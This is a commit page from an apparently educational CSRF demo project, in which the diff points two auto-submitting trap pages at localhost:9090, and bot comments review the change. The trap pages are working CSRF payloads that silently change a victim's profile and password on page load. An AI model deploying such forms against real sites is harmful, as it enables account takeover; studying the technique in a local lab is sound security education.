Commit

fix: 🐛 fix CSRF trap redirect form to suit for localhost
Hardwolf authored and Hardwolf committed Jun 8, 2020
1 parent 13c8ffd commit d2febd4
Showing 4 changed files with 2 additions and 42 deletions.
1 change: 0 additions & 1 deletion README.md
Expand Up @@ -15,7 +15,6 @@ So, Use for educational or research purposes only

## Image

<img width="1784" alt="loginPage" src="https://user-images.githubusercontent.com/22651097/73920112-1f2f9700-4908-11ea-855d-573007d440e1.png">


## How to Run
2 changes: 1 addition & 1 deletion Trap/DetailCSRF.gtpl
Expand Up @@ -7,7 +7,7 @@
<link rel="stylesheet" href="./assets/style.css" type="text/css">
<body onload="document.csrf.submit();">
<p>aaaaa</p>
<form name="csrf" action="http://localhost/profile/edit/update" method="POST">
<form name="csrf" action="http://localhost:9090/profile/edit/update" method="POST">
<input type="hidden" name="username" value="Hacked!!">
<input type="hidden" name="age" value="2048">
<input type="hidden" name="mail" value="[email protected]">
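Review bot: The form `action` hardcodes the target origin `http://localhost:9090` directly in the template, and the same literal is repeated in Trap/PasswdCSRF.gtpl, so any later host or port change has to be made by hand in every trap page. If these templates are rendered server-side, consider passing the target base URL in as a template value from a single configuration setting and building the `action` from it.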
2 changes: 1 addition & 1 deletion Trap/PasswdCSRF.gtpl
Expand Up @@ -7,7 +7,7 @@
<link rel="stylesheet" href="./assets/style.css" type="text/css">
<body onload="document.csrf.submit();">
<p>aaaaa</p>
<form name="csrf" action="http://localhost/profile/compchangepasswd" method="POST">
<form name="csrf" action="http://localhost:9090/profile/compchangepasswd" method="POST">
<input type="hidden" name="passwd" value="bouyadakarasa...">
<input type="hidden" name="confirm" value="bouyadakarasa...">
<input type="submit" value="submit">
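Review bot: The new `action` on the form line assumes the target app listens on port 9090, but nothing visible in this change says where that port is set or documents it. A short note in the README's "How to Run" section stating the expected port would keep the trap page and the app from drifting apart; otherwise the auto-submitted POST fails to connect and the demo looks broken with no hint why.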
39 changes: 0 additions & 39 deletions runenv/docker-compose.yml

This file was deleted.
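Review bot: Deleting runenv/docker-compose.yml (39 lines) is not mentioned in the commit message, which only describes the CSRF trap form change. Either split the removal into its own commit with a reason, or extend the message, and check that the README's run instructions do not still depend on the compose file.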

0 comments on commit d2febd4